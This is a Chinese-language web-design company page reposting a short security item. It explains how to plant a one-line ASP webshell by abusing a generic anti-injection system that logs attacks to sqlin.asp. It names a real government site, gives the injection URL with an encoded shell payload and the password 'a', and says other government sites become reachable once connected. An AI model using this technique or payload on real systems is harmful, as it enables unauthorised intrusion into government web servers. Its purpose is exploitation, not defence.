网站建设行业文章6
当前位置: 首页 -> 企业资讯 -> 行业文章 -> 直接给asp防注入getwebshell
鸿大千秋新闻顶部侧栏



直接给asp防注入getwebshell



这些网站都用的通用防注入系统
有个别网站的目录存在sqlin.asp保存注入记录  可以写入一句话木马
比如http://pzzl.gov.cn/news_type.asp?id=1413 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾
可在http://pzzl.gov.cn/sqlin.asp写入一句话,密码a
连接上去可以看到另外的几个政府网站

本文转自乌云由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理。



鸿大千秋网站建设团队敬上







Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有


联系方式:
全国热线电话:400-6928-163
传真:0755-6165-8483
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号